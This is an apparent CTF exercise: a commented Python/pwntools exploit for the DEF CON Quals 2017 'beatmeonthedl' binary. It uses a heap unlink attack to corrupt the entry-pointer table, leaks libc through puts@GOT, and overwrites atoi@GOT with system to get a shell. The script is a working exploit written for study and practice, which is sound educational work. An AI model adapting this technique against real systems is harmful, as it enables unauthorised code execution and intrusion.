DEF CON Quals 2017: beatmeonthedl


Unlink 练习题（an unlink-attack exercise: a fake chunk is unlinked to gain a write into the entry-pointer table, then GOT entries are leaked and overwritten）

#!/usr/bin/python 

from pwn import *

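sh = process("./beatmeonthedl")
# gdb.attach(sh)
elf = ELF('./beatmeonthedl')
# NOTE(review): the leak is resolved against this *local* libc. The script
# only yields a shell if this file is the same build as the libc the target
# actually runs; with a different libc the `system` offset computed later is
# wrong. Point this at the target's libc when attacking a remote instance.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# (The old pre-computed system/'/bin/sh'/puts offsets were dropped: nothing
# used them, and `'/bin/sh' - system` was a meaningless delta. All libc
# addresses are derived from the runtime leak below.)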

def create(content):
    """Menu option 1: allocate a new entry whose text is `content`.

    `content` is sent with a trailing newline; the menu that the program
    prints afterwards is drained with a fixed-size read and discarded.
    """
    option = "1"
    sh.sendline(option)
    sh.recvuntil("Request text > ")
    sh.sendline(content)
    _menu = sh.recv(1024)  # drain the redrawn menu

def edit(index, content):
    """Menu option 4: overwrite entry `index` with `content`.

    Unlike create(), the new text is sent *raw* (no trailing newline) so the
    exact bytes of a binary payload reach the target buffer. The prompt and
    the redrawn menu are drained with fixed-size reads.
    """
    option = "4"
    sh.sendline(option)
    sh.recvuntil("choice: ")
    sh.sendline(str(index))
    _prompt = sh.recv(1024)
    sh.send(content)
    _menu = sh.recv(1024)

def remove(index):
    """Menu option 3: free the entry at `index`.

    NOTE(review): edit() waits for the literal "choice: " prompt while this
    helper drains with recv(1024); if the delete prompt is the same string,
    recvuntil("choice: ") would be the less racy choice -- confirm against the
    binary's output before changing it.
    """
    option = "3"
    sh.sendline(option)
    _prompt = sh.recv(1024)
    sh.sendline(str(index))
    _menu = sh.recv(1024)


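sh.recv(1024)
print "------sending username and password------"
sh.sendline("mcfly")
sh.recv(1024)
sh.sendline("awesnap")

sh.recvuntil("| ")

print "------attack------"
# Address of the global table that stores the per-index entry pointers.
# Every pointer in the fake chunk is expressed relative to slot 0 of it.
fake_addr = 0x0000000000609E80
# Fake chunk placed in entry 0:
#   prev_size = 0, size = 0x30, fd = &slot0 - 0x18, bk = &slot0 - 0x10
# With these values fd->bk and bk->fd both read back slot 0 itself, which
# satisfies the "corrupted double-linked list" check; the unlink then ends
# with BK->fd = FD, i.e. slot 0 := fake_addr - 0x18.
# (Assumes a glibc-style unlink macro -- the allocator is not visible here.)
fake_chunk = p64(0) + p64(0x30) + p64(fake_addr - 0x18) + p64(fake_addr - 0x10)
fake_chunk = fake_chunk.ljust(0x30, 'a')
# Header of the *following* chunk (entry 1): prev_size = 0x30 points back at
# the fake chunk and size 0x42 has PREV_INUSE clear, so freeing entry 1
# consolidates backwards and unlinks the fake chunk.
fake_chunk += p64(0x30) + p64(0x42)
create('B' * 6)  # index 0: overwritten with the fake chunk below
create('C' * 6)  # index 1: freed to trigger the unlink
create('4')      # index 2: its pointer is later redirected to atoi@GOT
edit(0, fake_chunk)
remove(1)
# Slot 0 now points 0x18 bytes below the table, so pad 0x18 bytes and then
# rewrite the table entries themselves:
#   slot 0 -> puts@GOT (read back for the leak)
#   slot 1 -> NULL
#   slot 2 -> atoi@GOT (written to for the hijack)
# NOTE(review): this needs a writable GOT (binary built without Full RELRO).
payload = 'A' * 0x18 + p64(elf.got['puts']) + '\x00' * 8 + p64(elf.got['atoi'])
edit(0, payload)
# Option 2 lists the entries; entry 0 now dumps the contents of puts@GOT,
# i.e. the resolved libc address of puts (presumably already resolved,
# since the program has printed text by this point -- otherwise the leak
# would be a PLT stub address).
sh.sendline("2")
sh.recvuntil('0) ')
# recvn() rather than recv(): recv(6) may legitimately return fewer than
# 6 bytes on a partial read, and u64() then raises on a short buffer.
puts_addr = u64(sh.recvn(6) + '\x00\x00')
print sh.recv(1024)
log.success('puts addr: ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
log.success('libc base: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
# (A '/bin/sh' address in libc is not needed: the string is supplied as the
# menu input below, so the former unused `binsh_addr` was dropped.)

# Overwrite atoi@GOT with system. The menu input is presumably converted
# with atoi(), so the next "choice" we send -- the string "/bin/sh" --
# ends up as system("/bin/sh").
edit(2, p64(system_addr))
sh.send('/bin/sh')
sh.interactive()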

